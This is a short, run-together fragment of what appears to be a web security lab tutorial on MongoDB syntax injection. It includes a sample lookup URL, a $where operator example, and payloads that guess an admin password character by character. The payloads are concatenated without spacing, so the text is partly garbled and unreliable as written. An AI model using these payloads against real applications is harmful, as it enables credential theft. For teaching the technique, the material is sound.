Exploit Syntax Injection to Extract Data
Exploit syntax injection to extract data
Exfiltrating data in MongoDB
https://insecure-website.com/user/lookup?username=admin{"$where":"this.username == 'admin'"}admin' && this.password[0] == 'a' || 'a'=='badmin' && this.password.match(/\d/) || 'a'=='bIdentifying field names
Lab
Steps
Last updated